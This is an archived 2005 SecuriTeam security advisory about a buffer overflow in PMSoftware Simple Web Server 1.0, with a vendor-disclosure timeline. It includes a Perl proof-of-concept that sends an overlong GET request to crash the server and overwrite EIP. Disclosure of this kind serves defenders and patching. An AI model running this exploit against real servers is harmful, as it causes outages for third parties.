[NT] PMSoftware Simple Web Server Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/05

  • Next message: SecuriTeam: "[UNIX] PHP-Nuke HTTP Response Splitting" 
    To: list@securiteam.com
Date: 19 Apr 2005 15:06:05 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      PMSoftware Simple Web Server Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.pmx.it/> Simple Web Server the easy and small way to open an
    HTTP Web Server"

    PMSoftware's Simple Web Server doesn't do proper bounds checking handling
    of normal GET requests. Sending an overlong page or script name, it causes
    an buffer overflow and an attacker can run arbitrary code on the victims
    machine.

    DETAILS

    Vulnerable Systems:
     * Simple Web Server version 1.0

    The following request causes Simple Web Server to crash:
    GET /AAAAAA.....AAAA with 260 A's

    Exploit:
    #!/usr/bin/perl
    # DoS Exploit By mthumann@ernw.de
    # Tested against WinXP + SP2
    # Remote Buffer Overflow in PMSoftware Simple Web Server 1.0.15
    # buffer[250]

    use Socket;

    print "PMSoftware Simple Web Server Exploit by Michael Thumann \n\n";

    if (not $ARGV[0]) {
            print "Usage: swsexploit.pl <host>\n";
    exit;}

    $ip=$ARGV[0];

    print "Sending Shellcode to: " . $ip . "\n\n";
    my $testcode= "ERNWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
    "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB".
    "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC".
    "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD".
    "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE".
    "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF".
    "ABCDEFGHIJAAAA"; #EIP =41414141

    my $attack="GET /".$testcode." HTTP/1.1\n" ;

    $target= inet_aton($ip) || die("inet_aton problems");
            socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                    die("Socket problems\n");
            if(connect(S,pack "SnA4x8",2,80,$target)){
                    select(S);
                    $|=1;
                    print $attack;
                    my @in=<S>;
                    select(STDOUT);
                    close(S);
            } else { die("Can't connect...\n"); }

    Disclosure Timeline:
    17 Feb 2005: Vulnerability reported to vendor
    28 Feb 2005: 2nd report because the vendor didn't respond
    07 Mar 2005: 3rd mail sent to thre vendor - vendor didn't respond
    18 Apr 2005: Public Disclosure

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mozilla@ids-guide.de> ERNW
    Security.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] PHP-Nuke HTTP Response Splitting"

    Relevant Pages

    • [TOOL] WebServerFP, Web Server Fingerprint Tool
      ... HTTP code ... Currently only limited amounts of web server types are available. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [TOOL] Malloc() WebMiner, Web Server File and Directory Enumerator (Miner)
      ... to our service provider team. ... used to find common web server exposures and also ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] Xitami Web Server Plaintext Administrator Password Storage
      ... Xitami is a multithreaded Web server. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] Xedus Webserver Directory Traversal and DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Xedus web server is vulnerable to a directory traversal. ... this vulnerability constitutes a denial of ...
      (Securiteam)
    • [NEWS] WebReflex Directory Traversal Vulnerability
      ... allows remote attackers to traverse beyond the normally bound HTML root ... directory provided by the web server. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)